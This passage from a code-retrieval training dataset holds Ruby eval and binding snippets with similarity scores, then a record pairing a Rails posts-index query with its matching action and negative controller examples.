"def current_eval(string, ebinding=Mission.eval_binding)\n ebinding = ebinding.call if ebinding.is_a?(Proc)\n eval(string, ebinding)\n end",
"def context_for_eval; end",
"def evaluate(scope, locals, &block); end",
"def bind\n binding\n end",
"def eval_expression\n eval(expression, binding)\n end",
"def eval(str)\n end",
"def get_binding\n a = 123\n binding\nend",
"def eval(env)\n env.variable_get(self)\n end",
"def invoke(*values, &proc)\n if values.first.is_a? Binding\n bind = values.shift\n else\n bind = Kernel.binding()\n end\n rewritten_sexp = rewrite_sexp(proc.to_sexp, values)\n ruby = generate_ruby(rewritten_sexp)\n p ruby\n rewritten_proc = eval(ruby, bind)\n super(values, &rewritten_proc)\n end",
"def eval\n yield self\n end",
"def eval\n execute\n end",
"def bind(p0) end",
"def bind(p0) end",
"def compile(wrap: :proc, bind: BindingHelper.empty_binding, locals: nil, pre: nil, post: nil, context_name: '_context')\n\t\t\t\tsrc=@src\n\t\t\t\tsrc=BindingHelper.local_extraction(locals, context_name: context_name)+src if locals\n\t\t\t\tsrc=pre+\"\\n\"+src if pre\n\t\t\t\tsrc<< post+\"\\n\" if post\n\t\t\t\tto_eval=case wrap\n\t\t\t\t\twhen :eval; @src\n\t\t\t\t\twhen :lambda; \"lambda { |#{context_name}| #{src} }\"\n\t\t\t\t\twhen :proc; \"Proc.new { |#{context_name}| #{src} }\"\n\t\t\t\t\twhen :module; \"Module.new { |#{context_name}| #{src} }\"\n\t\t\t\t\twhen :unbound\n\t\t\t\t\t\t#wrapping in a method allows us to pass a block to a code\n\t\t\t\t\t\t#calling yield\n\t\t\t\t\t\trequire 'dr/ruby_ext/meta_ext'\n\t\t\t\t\t\treturn Meta.get_unbound_evalmethod('eruby', src, args: context_name)\n\t\t\t\t\twhen :unbound_instance\n\t\t\t\t\t\t#here we wrap in a method that the calls instance_eval\n\t\t\t\t\t\trequire 'dr/ruby_ext/meta_ext'\n\t\t\t\t\t\treturn Meta.get_unbound_evalmethod('eruby', <<-RUBY, args: context_name)\n\t\t\t\t\t\t\tself.instance_eval do\n\t\t\t\t\t\t\t\t#{src}\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\tRUBY\n\t\t\t\t\twhen :string\n\t\t\t\t\t\tsrc.to_s\n\t\t\t\t\telse \n\t\t\t\t\t\twarn \"wrap meth #{warn} not understood, defaulting to String\"\n\t\t\t\t\t\tsrc\n\t\t\t\t\tend\n\t\t\t\treturn eval(to_eval, bind, \"(wrap #{@filename})\")\n\t\t\tend",
"def eval(*args) # :nodoc:\n Evaler.eval(args[0], *args)\n end",
"def eval_ex(e)\n case e\n when Symbol\n value = @var_tables.reverse_each.find{|var| break var[e] if var[e] }\n raise \"undefined variable: #{e}\" if value.nil?\n return value\n when Array\n method = e.first\n case method\n when :if0\n if0(e[1], e[2], e[3])\n when :fold\n fold(e[1], e[2], e[3])\n when *OP1\n send(method, e[1])\n when *OP2\n send(method, e[1], e[2])\n else\n raise \"unexpected expression method: #{method.inspect}\"\n end\n when Numeric\n e\n else\n raise \"unexpected expression: #{e.inspect}\"\n end\n end",
"def bind_with_indifference(obj)\n bind_without_indifference(obj) rescue class << obj; self end.class_eval(to_s(:ruby))\n end",
"def as_proc(bind=nil)\n args_ext = self.args.map { |e| \"#{e} = fd[\\\"#{e}\\\"];\" }\n code = \"Proc.new do |fd|; #{args_ext.join \" \"} #{self.to_code}; end\"\n if bind # All objects have eval value, we bind when not nil\n # CAS::Help.assert(bind, Binding)\n bind.eval(code)\n else\n eval(code)\n end\n end",
"def bind(*) end",
"def e *args\n do_conn(:eval, *args).to_ruby\n end",
"def get_binding\r\n binding()\r\n end",
"def dynamic=(_arg0); end",
"def get_binding(param)\n binding\nend",
"def binder=(_arg0); end",
"def recipe(name)\n eval(RECIPE, binding, __FILE__, RECIPE_LINE)\n nil\nend",
"def eval(tokens, env)\n\tif tokens.is_a? Symbol # variable reference\n\t\treturn env[tokens]\n\telsif !tokens.is_a? Array #constant literal\n\t\treturn tokens\n\telsif tokens[0] == :quote #quote expression\n\t\t_, exp = tokens \n\t\treturn exp\n\telsif tokens[0] == :if\t\t\t#if test conseq alt\n\t\t_, test, conseq, alt = tokens\n\t\treturn eval(eval(test, env) ? conseq : alt, env)\n\telsif tokens[0] == :define #define var exp\n\t\tenv[tokens[1]] = eval(tokens[2], env)\n#\telsif tokens[0] == \"set!\" #set \n#\t\tenv.set(x[1], eval(x[2], env))\n\telsif tokens[0] == :lambda #set user-defined procedure\n\t\t_, params, body = tokens\n\t\treturn procedure(params, body, env)\n\telse\n\t\tproc = eval(tokens[0],env)\t#collect the operator to evaluate\n\t\targs = []\n\t\tfor exp in tokens[1..-1] do \n\t\t\targs.push(eval(exp, env))\t#collect arguments\n\t\tend\n\t\tvalue =\tproc.call *args[0..-1]\n\t\treturn value\n\tend\nend",
"def value_in_binding(tp, key, &block)\n tp.binding.eval(key.to_s)\n rescue NameError, ArgumentError\n yield if block_given?\n end",
"def resolve_and_eval(env)\n res = self.resolve(env)\n res.is_a?(Crisp::Nodes::Operation) ? res.eval(env) : res\n end",
"def bind_to_object=(_arg0); end",
"def __ken_binding\n self.class.class_eval {remove_method :__ken_binding}\n binding\nend",
"def call(bind_vars={}, &block)\n bind(bind_vars).run(&block)\n end",
"def warning_eval(str, binding = T.unsafe(nil)); end",
"def run _obj, _binding = nil\n @template.placeholders.each do |ph|\n proc = instance_variable_get(\"@proc_for_#{ph}\".to_sym)\n @template.send(\"#{ph}=\",proc.call(_obj))\n end\n @template.execute \n end",
"def evalObjectArgument _obj, _args\n \"_obj evalObjectArgument _args;\" \n end",
"def eval script\n # native function. this stub is for documenting only\n end",
"def bb_eval(str, b = get_binding)\n b.eval(str)\n rescue StandardError, ScriptError => e\n at = e.backtrace\n locations = []\n locations << \"#{at.shift}: #{e.class} Exception(#{e.message})\"\n locations += at.map { |path| \"\\tfrom #{path}\" }\n\n errmsg(pr('eval.exception', text_message: locations.join(\"\\n\")))\n nil\n end",
"def test_can_call_lambda_w_symbol_derefed_in_object\n result = interpret 'a=~{foo: ->() {9}};%a[foo:]'\n assert_eq result, 9\n end",
"def call_on_binding(binding_, *context)\n if binding_.local_variable_defined?(applicable)\n binding_.local_variable_get(applicable)\n else\n invoke_lambda(binding_.receiver.method(applicable), binding_, *context)\n end\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def get_binding\n binding\n end",
"def __replace_eval__(line, gen_code)\n # class_eval\n if line =~ \n /(.*)((class_eval)|(module_eval)|(instance_eval)|(eval)) ?\\(?\"(.*)\"\\)? ?(.*)/\n printf \"%s%s {%s} %s\\n\", $1, $2, gen_code[:code], $8\n end\nend",
"def doSomething\r\n puts \"inside the method\"\r\n return binding\r\nend",
"def get_binding\n return binding()\n end",
"def get_binding\n return binding()\n end",
"def generate_binding(a_binding=binding)\n a_binding.local_variables do |local_var|\n a_binding.local_variable_set local_var, nil\n end\n @bound_procs.each_with_index do |bound_proc, index|\n a_binding.local_variable_set \"proc_#{index}\", bound_proc\n end\n @bound_constants.each_with_index do |bound_const, index|\n a_binding.local_variable_set \"const_#{index}\", bound_const\n end\n a_binding\n end",
"def bind(key,obj,*args)\n\t\t@bindings[key] = [obj,*args]\n\tend",
"def get_binding\n binding()\n end",
"def get_binding\n binding()\n end",
"def get_binding\n binding()\n end",
"def execute(cmd)\n eval(EXECUTE, binding, __FILE__, EXECUTE_LINE)\n nil\nend",
"def test_method_calls_can_take_and_execute_fn_parm\n result = interpret 'a=~{foo: ->(fn) { %fn }};%a.foo(->() {4})'\n assert_eq result, 4\n end",
"def expression=(_arg0); end",
"def evaluate(expr = nil, path=nil, line=nil, &bl)\n return instance_exec(&bl) if bl\n ::Kernel.eval expr, __eval_binding, *[path, line].compact\n end",
"def bind\n binding\n end",
"def bind\n \n end",
"def get_binding\n a = 123 # => 123\n binding # => #<Binding:0x007fd7c087add0>\nend",
"def expand(str)\n str = str.gsub(/\\$\\{([^}]+)\\}/, '#{\\1}') # ${..} => #{..}\n eval \"\\\"#{str}\\\"\", @placeholders.instance_eval { binding }\n end",
"def do_binding\n symbol = pop[:value]\n\t\tvalue = pop\n\t\t@fstack.set( symbol, value )\n end",
"def eval_value(*args)\n eval(*args).value\n end",
"def compile_eval_arg(scope, arg)\n if arg.respond_to?(:position) && arg.position != nil\n pos = arg.position.inspect\n if pos != @lastpos\n @e.comment(arg.position.inspect)\n if @trace\n compile_exp(scope,[:call,:puts,arg.position.inspect])\n end\n end\n @lastpos = pos\n end\n args = get_arg(scope,arg)\n atype = args[0]\n aparam = args[1]\n if atype == :ivar\n ret = compile_eval_arg(scope, :self)\n @e.load_instance_var(ret, aparam)\n return @e.result_value\n elsif atype == :possible_callm\n return compile_eval_arg(scope, [:callm, :self, arg,[]])\n end\n return @e.load(atype, aparam)\n end",
"def try_eval(expr)\n eval_expr(expr)\n end",
"def process_call(exp)\n receiver_node_type = exp.first.nil? ? nil : exp.first.first\n receiver = process exp.shift\n receiver = \"(#{receiver})\" if ASSIGN_NODES.include? receiver_node_type\n\n name = exp.shift\n args = []\n\n # this allows us to do both old and new sexp forms:\n exp.push(*exp.pop[1..-1]) if exp.size == 1 && exp.first.first == :arglist\n\n @calls.push name\n\n in_context :arglist do\n until exp.empty? do\n arg_type = exp.first.sexp_type\n is_empty_hash = (exp.first == s(:hash))\n arg = process exp.shift\n\n next if arg.empty?\n\n strip_hash = (arg_type == :hash and\n not BINARY.include? name and\n not is_empty_hash and\n (exp.empty? or exp.first.sexp_type == :splat))\n wrap_arg = Ruby2Ruby::ASSIGN_NODES.include? arg_type\n\n arg = arg[2..-3] if strip_hash\n arg = \"(#{arg})\" if wrap_arg\n\n args << arg\n end\n end\n\n case name\n when *BINARY then\n # CUSTOM\n \"#{receiver}#{name}#{args.join(', ')}\"\n when :[] then\n receiver ||= \"self\"\n \"#{receiver}[#{args.join(', ')}]\"\n when :[]= then\n receiver ||= \"self\"\n rhs = args.pop\n \"#{receiver}[#{args.join(', ')}] = #{rhs}\"\n when :\"-@\" then\n \"-#{receiver}\"\n when :\"+@\" then\n \"+#{receiver}\"\n # CUSTOM\n when :lambda then\n '->'\n # CUSTOM\n when :call then\n args = if args.empty?\n nil\n elsif args\n args.join(',')\n end\n\n \"#{receiver}[#{args}]\"\n else\n args = nil if args.empty?\n\n # CUSTOM\n args = if args and args.size == 1\n # It's safe to map a single arg to be spaced from\n # the receiver w/out parens in this context\n \" #{ args.first }\"\n elsif args\n \"(#{args.join(', ')})\"\n end\n\n receiver = \"#{receiver}.\" if receiver\n\n \"#{receiver}#{name}#{args}\"\n end\n ensure\n @calls.pop\n end",
"def eval\n begin\n if !func_exist?(@name)\n raise NameError, \"Function #{@name} has not been declared.\"\n else\n if @@our_debug then puts \"#{debug_time} Function called : #{@name}\" end\n para = @@func_list[@name].para\n if @args[0] != nil and para[0] != nil\n #Making sure we only get Basic_container type objects in @args\n @args.each_with_index {|arg, idx| @args[idx] = convert_obj(arg)}\n scope_increase\n @@func_list[@name].para.each {|item| item.eval }\n @args.each_with_index {|arg, idx|\n Assign_class.new(para[idx].name, arg).eval\n }\n elsif para[0] != nil\n scope_increase\n para.each {|item| item.eval }\n else\n scope_increase\n end\n ret_value = @@func_list[@name].eval\n scope_decrease\n return convert_obj(ret_value)\n end\n Bool_class.new('bool', 'FALSE')\n rescue => error\n puts error.inspect\n end\n end",
"def instance_eval\n end",
"def eval(obj, str)\n @extension.evaluate(obj, str)\n end"
] |
[
"0.75313014",
"0.7441519",
"0.710835",
"0.7097458",
"0.7048693",
"0.70203006",
"0.6774199",
"0.6713175",
"0.6596647",
"0.6596647",
"0.6571318",
"0.6488089",
"0.6488089",
"0.6442359",
"0.6355621",
"0.6331491",
"0.6294697",
"0.6294697",
"0.6283392",
"0.62818265",
"0.6239487",
"0.6223339",
"0.6172398",
"0.6116129",
"0.61065483",
"0.6087584",
"0.6044246",
"0.6036835",
"0.6021368",
"0.6015855",
"0.6001672",
"0.59991574",
"0.59977096",
"0.598628",
"0.5974302",
"0.59712905",
"0.59687775",
"0.5951734",
"0.5950591",
"0.59205717",
"0.59117085",
"0.59053814",
"0.59053814",
"0.5900759",
"0.5891652",
"0.5858361",
"0.5852073",
"0.58505523",
"0.58005744",
"0.5777062",
"0.5771052",
"0.5758545",
"0.57321596",
"0.572154",
"0.5717252",
"0.5709494",
"0.57090896",
"0.57085013",
"0.5690934",
"0.56841034",
"0.5683218",
"0.56820476",
"0.5674146",
"0.56705284",
"0.566704",
"0.5651587",
"0.5640356",
"0.5639068",
"0.5635017",
"0.5635017",
"0.5635017",
"0.5635017",
"0.5635017",
"0.5635017",
"0.5635017",
"0.5635017",
"0.56338173",
"0.56085813",
"0.5598999",
"0.5598999",
"0.5592848",
"0.5589959",
"0.5578738",
"0.5578738",
"0.5578738",
"0.55651206",
"0.5564176",
"0.554666",
"0.5544974",
"0.55360764",
"0.55337226",
"0.5528109",
"0.55254245",
"0.55195177",
"0.55171937",
"0.551384",
"0.5511636",
"0.5506622",
"0.5495474",
"0.5487023",
"0.5468513"
] |
0.0
|
-1
|
GET /posts GET /posts.json
|
def index
@posts = Post.all
@event = Event.find(params[:event_id])
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def show\n @posts = Post.find(params[:id])\n render json: @posts\n end",
"def index\n @posts = Post.all\n render json: @posts\n end",
"def index\n @posts = Post.all\n\n render json: @posts\n end",
"def index\n @posts = Post.all\n\n render json: @posts\n end",
"def index\n @posts = Post.all\n render json: @posts\n end",
"def index\n\n @posts = Post.all\n\n render json: @posts, status: 200\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json {render json: @posts}\n end\n end",
"def index\n render json: { posts: Post.all }\n end",
"def index\n @posts = Post.order(\"created_at DESC\").includes(:user)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n respond_to do |format|\n format.html #index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @posts }\n end\n end",
"def index\n @posts = Post.all\n \n render json: @posts\n end",
"def show\n @post = Post.find(params[:id])\n\n render json: @post\n end",
"def show\n post = Post.find(params[:id])\n render json: post\n end",
"def show\r\n post = Post.find(params[:id])\r\n render json: post\r\n end",
"def display_posts\n begin\n response = RestClient.get \"#{@@DOMAIN}/api/posts.json?all\", authorization_hash\n\n puts \"Response code: #{response.code}\"\n puts \"Response cookies:\\n #{response.cookies}\\n\\n\"\n puts \"Response headers:\\n #{response.headers}\\n\\n\"\n puts \"Response content:\\n #{response.to_str}\"\n\n js = JSON response.body\n js.each do |item_hash|\n item_hash.each do |k, v|\n puts \"#{k}: #{v}\"\n end\n end\n rescue => e\n puts STDERR, \"Error accessing REST service. Error: #{e}\"\n end\n end",
"def posts(opts)\n response = get(\"posts\", opts)\n response\n end",
"def index\n @posts = Post.all.order(created_at: :asc)\n json_response(@posts)\n end",
"def show\n \trender json: Post.find(params[:id])\n end",
"def index\n render json: Post.all\n end",
"def show\n\t \trender json: Post.find(params[:id])\n\t end",
"def show\n @user = User.find(params[:user_id])\n @post = @user.posts.find(params[:id])\n\n render json: @post\n end",
"def index\n @posts = Post.paginate(:page => params[:page], :per_page => 10).order('id DESC')\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def show\n render json: Post.find(params[\"id\"])\n end",
"def index\n render json: { posts: current_user.posts.all.map(&:to_h) }\n end",
"def index\n @posts = Post.all\n @posts = paginate(@posts)\n authorize @posts\n\n render json: @posts, each_serializer: Api::V1::PostSerializer, meta: meta_attributes(@posts)\n end",
"def index\n @posts = Mist::Post.recently_published(20, Mist.authorized?(:view_drafts, self))\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render :json => @posts }\n end\n end",
"def show\n @user = User.find(params[:id])\n @posts = @user.posts\n\n respond_to do |format|\n format.json { render json: {user: User._build(@user), posts: Post.build_posts(@posts)}, location: root_path }\n end\n end",
"def show\n render json: @post\n end",
"def show\n render json: @post\n end",
"def index\n\t\tgon.posts = Post.all.as_json\n\tend",
"def index\n # @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n # format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n format.atom\n end\n end",
"def get(options = {})\n response= handle_errors { self.class.get('/get', :query => options)}\n if response[\"posts\"][\"post\"].is_a?(Hash)\n Rubycious::Post.new response[\"posts\"][\"post\"]\n elsif response[\"posts\"][\"post\"].is_a?(Array)\n response[\"posts\"][\"post\"].collect{|i| Rubycious::Post.new(i)}\n else\n nil\n end\n end",
"def index\n\n # We display the posts be cronological inverted order\n if authenticated?\n @posts = Post.order('created_at DESC').page(params[:page])\n else\n @posts = Post.order('created_at DESC').where(:status => :true).page(params[:page])\n end\n \n respond_to do |format|\n format.html { render html: @posts }\n format.json { render json: @posts }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n \n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def show\n @posts = @game.posts.order(created_at: :desc).paginate(page: params[:page], per_page: 5)\n respond_to do |format|\n format.json { render template: 'api/games/game.json' }\n end\n end",
"def show\n post = Post.find_by(id: params[:id])\n if post \n render json: post\n else\n render json: {errors: 'Not found'}\n end\n end",
"def show\n render :json => @post\n end",
"def get(options = EMPTY_HASH)\n parameters = Specification.new(\n tag: Types::Tags,\n dt: Types::Time,\n url: Types::URL,\n meta: Types::Boolean\n ).parameters(options)\n posts_from client.get(\"/posts/get\", parameters)\n end",
"def index\n @posts = Post.all\n # Post.all returns all of the posts currently in the \n # database as an array of Post records that we store \n # in an instance variable called @posts.\n # http://guides.rubyonrails.org/active_record_querying.html\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n # The respond_to block handles both HTML and JSON calls \n # to this action. If you browse to \n # http://localhost:3000/posts.json, you’ll see a JSON \n # containing all of the posts. \n end",
"def show\n render json: @post, serializer: Api::V1::PostSerializer\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n @posts = PostService.getAllPosts\n end",
"def show\n respond_to do |format|\n format.html\n format.json { render jsonapi: @post }\n end\n end",
"def index\n #@posts = Post.all\n @posts = Post.paginate( :page => params[:page],\n :per_page => 2\n )\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def show\n @post = Post.where(:id => params[:id]).first\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def index\n\t@posts = list_posts\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n #format.json { render json: @post }\n format.json do\n render :json => @post.to_json(:only => [:id, :title, :text, :lat, :lng, :created_at, :post_type, :likes], \n :methods => [:image_url, :video_url], \n :include => [:comments])\n end\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n format.xml { render xml: @posts }\n end\n end",
"def posts_list\n posts = Post.all.published.order(score: :desc, created_at: :desc)\n post_tags = Post.published.order(score: :desc, created_at: :desc).map { |post| Post.includes(:tags, :taggings).find_by(id: post.id).tags }\n categories = Category.all\n tags = Tag.all\n\n render_json(posts: posts, categories: categories, tags: tags, post_tags: post_tags)\n end",
"def index\n @posts = Post.all.order_by([:date_published, :desc]).page(params[:page]).per(20)\n #authorize! if cannot? :read, @posts\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def show\n @post ||= Mist::Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n page = params[:page]\n per_page = params[:per_page]\n\n posts = Post.order(published_at: :desc).page(page).per(per_page)\n\n # Передаём в заголовке общее количество страниц и записей.\n response.headers['Total-Pages'] = posts.total_pages\n response.headers['Total-Count'] = posts.total_count\n\n render json: posts\n end",
"def index\n render json: Post.all.order(id: :desc), each_serializer: V1::Posts::PostSerializer\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.json { render json: @post }\n format.xml { render xml: @posts }\n end\n end",
"def posts\n posts = @client.entries(content_type: 'post').items\n posts || []\n end",
"def show\n @post = Post.find(params[:id])\n \n respond_to do |format|\n format.html { render 'application/index' }\n format.json { render :json => { :post => @post.as_json } }\n end\n end",
"def show\r\n @post = root_post_of(Post.find(params[:id]))\r\n\r\n respond_to do |format|\r\n format.html # show.html.erb\r\n format.json { render json: @post }\r\n end\r\n end",
"def index\n @posts = Post.order(created_at: :desc)\n respond_to do |format|\n format.html { render }\n format.text { render }\n format.xml { render xml: @posts }\n format.json { render json: @posts.to_json }\n end\n end",
"def index\n @art_posts = ArtPost.all\n\n render json: @art_posts\n end",
"def index\n per_page = params[:per_page] ? params[:per_page] : Post::PER_PAGE\n @posts = Post.by_published_date.paginate(page: params[:page], per_page: per_page)\n # Set count of posts and count of pages to query headers\n add_headers\n render json: @posts\n end",
"def show\n render json: {\n data: @post\n }\n end",
"def show\n @feed = Feed.find(params[:id])\n @posts = @feed.posts.order(\"published desc\").paginate(:page => params[:page], :per_page => 20)\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @feed }\n end\n end",
"def index\n # TODO: implement listing all posts\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts, :include => :tags }\n end\n end",
"def list\n comments = Comment.where(post: @post)\n render json: comments, status: 200\n end",
"def show\n @post = current_user.posts.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n\t \tif params[:title]\n\t\t render json: Post.search(params[:title])\n \t\telse\n\t \trender json: Post.all\n \tend\n\t end",
"def index\n unless can?(:manage, Post)\n @posts = @posts.published\n end\n \n respond_with @posts\n end",
"def index\n @posts = Post.all\n respond_with(@posts)\n end",
"def index\n @posts = Post.all.reverse\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n render json: current_user.posts.all\n # TODO order posts alphabetically\n end",
"def index\n @posts = Post.includes(:author, channel: [:posts]).order(created_at: :desc)\n @posts = @posts.where(channel: @channel) if params[:channel_id]\n @posts = @posts.page(params[:page])\n\n respond_to do |format|\n format.html\n format.json { render jsonapi: @posts }\n end\n end",
"def show\n #@post = Post.find(params[:id])\n\n #respond_to do |format|\n # format.html # show.html.erb\n #format.json { render json: @post }\n #end\n end",
"def index\n @page = params[:page] || 1\n @posts = @exchange.posts.page(@page, context: 0).for_view\n respond_to do |format|\n format.json do\n serializer = PostSerializer.new(\n @posts,\n links: { self: paginated_json_path(@posts.current_page),\n next: paginated_json_path(@posts.next_page),\n previous: paginated_json_path(@posts.previous_page) },\n include: %i[user]\n )\n render json: serializer.serialized_json\n end\n end\n end",
"def index\n @postos = Posto.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @postos }\n end\n end",
"def show\n @post = Post.find(params[:id])\n render json: @post, meta: { status: :ok }, meta_key: 'result'\n end",
"def show\n # @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n # format.json { render json: @post }\n end\n end",
"def index\n @api_v1_posts = Api::V1::Post.all\n end",
"def index\n @posts = Post.order(\"created_at DESC\").where(:published => true).limit(5)\n @title = \"Home\"\n @description = \"the blog and website of bassist and programmer Johnny Grubb. no baseball information here.\"\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n format.xml\n end\n end",
"def index\n respond_with Post.all\n end"
] |
[
"0.7865315",
"0.7494904",
"0.7494433",
"0.7494433",
"0.7488696",
"0.74314564",
"0.728645",
"0.728645",
"0.728645",
"0.72562826",
"0.72522277",
"0.7247287",
"0.7246305",
"0.72221965",
"0.72042215",
"0.72039723",
"0.7169929",
"0.71689725",
"0.71644753",
"0.7121855",
"0.71152896",
"0.7108617",
"0.70960873",
"0.7071454",
"0.7063796",
"0.70486146",
"0.7044637",
"0.7029959",
"0.69793427",
"0.6957234",
"0.6945899",
"0.6921306",
"0.6918641",
"0.6897198",
"0.689313",
"0.6890521",
"0.68769336",
"0.6876437",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6865055",
"0.6856369",
"0.6854135",
"0.68492866",
"0.6837785",
"0.6814047",
"0.67974555",
"0.67884254",
"0.6782457",
"0.6779375",
"0.6779375",
"0.6770256",
"0.67645854",
"0.6760845",
"0.6751376",
"0.6740988",
"0.6720944",
"0.6703801",
"0.66790265",
"0.6662053",
"0.6649574",
"0.66334385",
"0.6629263",
"0.66292495",
"0.6625863",
"0.6625277",
"0.6619148",
"0.6612677",
"0.6612347",
"0.659554",
"0.65946317",
"0.6584386",
"0.6583931",
"0.6578741",
"0.6564504",
"0.6556115",
"0.65437686",
"0.65419716",
"0.65410036",
"0.6528237",
"0.65246344",
"0.6520045",
"0.65119064",
"0.6511185",
"0.64960027",
"0.64946514",
"0.64891815",
"0.6476575",
"0.64645535",
"0.6463598"
] |
0.0
|
-1
|
GET /posts/1 GET /posts/1.json
|
def show
@calendar = Calendar.find(params[:calendar_id])
@event = @calendar.events.find(params[:event_id])
#@post = Post.find[params[:id]]
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def show\n @posts = Post.find(params[:id])\n render json: @posts\n end",
"def show\n render json: Post.find(params[\"id\"])\n end",
"def show\r\n post = Post.find(params[:id])\r\n render json: post\r\n end",
"def show\n @post = Post.find(params[:id])\n\n render json: @post\n end",
"def show\n \trender json: Post.find(params[:id])\n end",
"def show\n post = Post.find(params[:id])\n render json: post\n end",
"def show\n\t \trender json: Post.find(params[:id])\n\t end",
"def show\n @post = Post.where(:id => params[:id]).first\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def index\n\n @posts = Post.all\n\n render json: @posts, status: 200\n end",
"def index\n @posts = Post.all\n render json: @posts\n end",
"def index\n @posts = Post.all\n\n render json: @posts\n end",
"def index\n @posts = Post.all\n\n render json: @posts\n end",
"def index\n @posts = Post.all\n render json: @posts\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def show\n @user = User.find(params[:user_id])\n @post = @user.posts.find(params[:id])\n\n render json: @post\n end",
"def index\n @posts = Post.all\n respond_to do |format|\n format.html #index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json {render json: @posts}\n end\n end",
